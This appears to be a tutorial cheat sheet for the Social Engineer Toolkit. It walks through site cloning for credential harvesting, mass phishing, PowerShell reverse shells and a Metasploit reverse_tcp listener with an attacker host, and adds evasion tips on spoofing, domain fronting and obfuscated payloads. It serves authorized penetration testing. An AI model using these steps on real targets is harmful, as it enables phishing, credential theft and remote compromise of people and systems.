Social Engineer Toolkit (SET)

The Social Engineer Toolkit (SET) is an open-source penetration testing framework for social engineering attacks. Developed by David Kennedy (ReL1K) and the TrustedSec team, SET automates a range of social engineering attacks and provides a comprehensive platform for testing human weaknesses during security assessments.

Installation and Setup

Installation on Kali Linux

```bash
# SET comes pre-installed on Kali Linux
setoolkit

# Update SET
cd /opt/set
git pull
```

Manual Installation

```bash
# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/

# Install dependencies
pip3 install -r requirements.txt

# Run setup
python setup.py install

# Launch SET
python setoolkit
```

Configuration

```bash
# Edit configuration file
nano /etc/setoolkit/set.config

# Key configuration options:
WEBATTACK_EMAIL=ON
APACHE_SERVER=ON
METASPLOIT_PATH=/usr/share/metasploit-framework
SENDMAIL=ON
EMAIL_PROVIDER=GMAIL
```

Main Menu Options

1) Social-Engineering Attacks

```bash
# Launch SET
setoolkit

# Select option 1 from main menu
# Social-Engineering Attacks submenu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
```

Spear-Phishing Attack Vectors

```bash
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload

# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file

# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support
```

Website Attack Vectors

```bash
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method

# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials

# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance

# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts
```

Attack Scenarios

Credential Harvesting

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method

# Harvester options:
1) Web Templates
2) Site Cloner
3) Custom Import

# Site Cloner example:
Enter URL to clone: https://gmail.com

# SET will clone the site and host it locally
# Captured credentials are saved to /root/.set/reports/
```

Phishing Email Campaign

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack

# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Set up email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign

# Email list format (emails.txt), one address per line:
user1@company.com
user2@company.com
user3@company.com
```

Infectious Media Generator

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator

# Media options:
1) File-Format Exploits
2) Standard Metasploit Executable

# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits

# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable
```

PowerShell Attack Vectors

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors

# PowerShell options:
1) PowerShell Alphanumeric Shellcode Injector
2) PowerShell Reverse Shell
3) PowerShell Bind Shell
4) PowerShell Dump SAM Database

# Reverse Shell example:
# - Enter IP address for reverse connection
# - Enter port for reverse connection
# - Generate PowerShell command
# - Execute on target system
```

Advanced Techniques

Custom Payloads

```bash
# Create custom payload
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener

# Payload options:
1) Windows Shell Reverse_TCP
2) Windows Meterpreter Reverse_TCP
3) Windows Meterpreter Reverse_HTTP
4) Windows Meterpreter Reverse_HTTPS
5) Linux Shell Reverse_TCP

# Configuration:
# - Set LHOST (attacker IP)
# - Set LPORT (listening port)
# - Generate payload
# - Set up listener
```

Multi-Attack Web Method

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method

# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking

# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage
```

Arduino-Based Attacks

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector

# Arduino attack types:
1) Powershell HTTP GET MSF Payload
2) WSCRIPT HTTP GET MSF Payload
3) Powershell HTTP POST MSF Payload
4) WSCRIPT HTTP POST MSF Payload
5) Download-Execute Powershell Attack
6) Download-Execute WSCRIPT Attack

# Generates an Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictions
```

Metasploit Integration

Setting Up Metasploit Integration

```bash
# Configure Metasploit path in SET
nano /etc/setoolkit/set.config

# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework

# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
```

Automated Listener Setup

```bash
# SET can automatically set up Metasploit listeners
# When creating payloads, SET prompts:
"Do you want to start the listener now? [y/n]:"

# Select 'y' for automatic listener setup
# SET will:
# 1) Generate the appropriate payload
# 2) Start msfconsole
# 3) Configure the handler
# 4) Start the listener
```

Reporting and Logging

Generated Reports

```bash
# Harvested credentials location
/root/.set/reports/

# View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt

# Email reports (if configured)
# - Automatic email notifications
# - Real-time credential capture alerts
```

Attack Logs

```bash
# SET log files
/root/.set/logs/

# View attack logs
tail -f /root/.set/logs/set_logfile.log

# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log

# Email logs
tail -f /var/log/mail.log
```

Report Generation

```bash
# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log

# Extract IP addresses (dotted-quad pattern; does not validate octet ranges)
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.set/logs/set_logfile.log

# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log
```
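The three grep commands above, combined into one pass as an added example (not part of SET or of the original page). The log lines are constructed, since this page does not document the real set_logfile.log layout; the script also rejects dotted quads with out-of-range octets, which the grep pattern alone would report.

```python
import re
from collections import Counter

# Constructed sample lines in the spirit of a SET log (format is an assumption).
SAMPLE_LOG = """\
2024-01-01 12:00:01 [*] Credential harvester started on 192.168.1.10
2024-01-01 12:03:14 [*] POST from 10.0.0.25 - credential captured: user1@company.com
2024-01-01 12:04:02 [*] POST from 10.0.0.25 - credential captured: user2@company.com
2024-01-01 12:05:40 [*] POST from 10.0.0.31 - credential captured: user3@company.com
2024-01-01 12:06:00 [*] Attack successful against 10.0.0.25
2024-01-01 12:07:12 [*] Attack successful against 10.0.0.31
2024-01-01 12:08:00 [!] Malformed request from 999.1.1.1 ignored
"""

# Same dotted-quad pattern as the grep command above.
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def valid_ipv4(addr):
    """True only if every octet is within 0..255 (the regex alone cannot check this)."""
    return all(0 <= int(octet) <= 255 for octet in addr.split("."))


def summarize_log(text):
    """Mirror the grep pipeline: case-sensitive 'credential' line count,
    'successful' line count, per-IP hit counts and rejected pseudo-addresses."""
    lines = text.splitlines()
    credential_lines = sum(1 for line in lines if "credential" in line)
    successful = sum(1 for line in lines if "successful" in line)
    ips = Counter()
    rejected = []
    for match in IP_RE.finditer(text):
        addr = match.group()
        if valid_ipv4(addr):
            ips[addr] += 1
        else:
            rejected.append(addr)
    return {
        "credential_lines": credential_lines,
        "successful": successful,
        "ips": dict(ips),
        "rejected": rejected,
    }


if __name__ == "__main__":
    print(summarize_log(SAMPLE_LOG))
```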

Evasion Techniques

Email Delivery

```bash
# Domain reputation management
# - Use legitimate email providers
# - Gradual sending patterns
# - Personalized content

# Email header manipulation
# - SPF/DKIM configuration
# - Reply-to address spoofing
# - Message threading

# Content evasion
# - Image-based content
# - URL shorteners
# - Legitimate file hosting
```

Web Attack Evasion

```bash
# Domain fronting
# - CDN utilization
# - SSL/TLS encryption
# - Legitimate hosting providers

# User-Agent rotation
# - IP address rotation
# - Traffic timing variation
# - Legitimate referrer headers

# Content delivery
# - Staged payloads
# - Encrypted communications
# - Legitimate file formats
```

Payload Evasion

```bash
# Encoding techniques
# - Encryption methods
# - Packing/compression
# - Code obfuscation

# Delivery methods
# - Legitimate file formats
# - Trusted applications
# - Signed executables

# Execution techniques
# - Living off the land
# - PowerShell alternatives
# - Memory-only execution
```

Best Practices

Legal and Ethical Considerations

```bash
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality

# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
```
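A scope check that ties the authorization record above to the emails.txt target list from the Phishing Email Campaign section, as an added example (not part of SET or of the original page). Both inputs are constructed; the "Authorized domains:" line is an assumed addition to the authorization.txt format, since the echo commands above record the scope only as a description.

```python
import re

# Constructed authorization record in the format written by the echo commands above,
# plus an assumed "Authorized domains:" line that makes the scope machine-checkable.
AUTHORIZATION_TXT = """\
Social Engineering Test Authorization
Client: Company Name
Scope: Email addresses, domains
Date: 2024-01-01
Tester: Your Name
Authorized domains: company.com, mail.company.com
"""

# Constructed emails.txt, one address per line, including two entries that must not be sent to.
EMAILS_TXT = """\
user1@company.com
user2@company.com
user3@company.com
ceo@partner-company.com
user4@mail.company.com
not-an-email
"""

EMAIL_RE = re.compile(r"^[^@\s]+@([^@\s]+\.[^@\s]+)$")


def authorized_domains(auth_text):
    """Read the assumed 'Authorized domains:' line; an absent line means nothing is in scope."""
    for line in auth_text.splitlines():
        if line.lower().startswith("authorized domains:"):
            raw = line.split(":", 1)[1]
            return {d.strip().lower() for d in raw.split(",") if d.strip()}
    return set()


def check_scope(emails_text, domains):
    """Split the target list into in-scope, out-of-scope and malformed entries.
    Subdomains of an authorized domain count as in scope; lookalike domains
    such as partner-company.com do not, because the match requires a dot boundary."""
    in_scope, out_of_scope, malformed = [], [], []
    for raw in emails_text.splitlines():
        addr = raw.strip()
        if not addr or addr.startswith("#"):
            continue
        match = EMAIL_RE.match(addr)
        if not match:
            malformed.append(addr)
            continue
        domain = match.group(1).lower()
        if any(domain == d or domain.endswith("." + d) for d in domains):
            in_scope.append(addr)
        else:
            out_of_scope.append(addr)
    return in_scope, out_of_scope, malformed
```

Run the check before step 5 (import target email list) and feed SET only the in-scope list.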

Operational Security

```bash
# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures

# Infrastructure isolation
# - Separate testing networks
# - Dedicated email accounts
# - Isolated web servers

# Data protection
# - Encrypted storage
# - Secure transmission
# - Proper disposal
```

Testing Methodology

```bash
# Reconnaissance phase
# - Target identification
# - Information gathering
# - Attack vector selection

# Execution phase
# - Payload delivery
# - Credential harvesting
# - System compromise

# Post-exploitation
# - Persistence establishment
# - Data collection
# - Evidence gathering

# Reporting phase
# - Impact assessment
# - Remediation recommendations
# - Executive summary
```

Troubleshooting

Common Issues

```bash
# Email delivery problems
# - Check SMTP configuration
# - Verify DNS settings
# - Test email connectivity

# Web server issues
# - Check Apache configuration
# - Verify port availability
# - Test web connectivity

# Payload generation errors
# - Verify Metasploit integration
# - Check dependencies
# - Update SET framework

# Permission issues
# - Run as root user
# - Check file permissions
# - Verify directory access
```

Configuration Fixes

```bash
# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit   # Will recreate config

# Update SET framework
cd /opt/set
git pull
python setup.py install

# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2

# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix
```

Resources

  • SET Official Documentation
  • TrustedSec Blog
  • Social Engineering Framework
  • NIST Cybersecurity Framework
  • SANS Social Engineering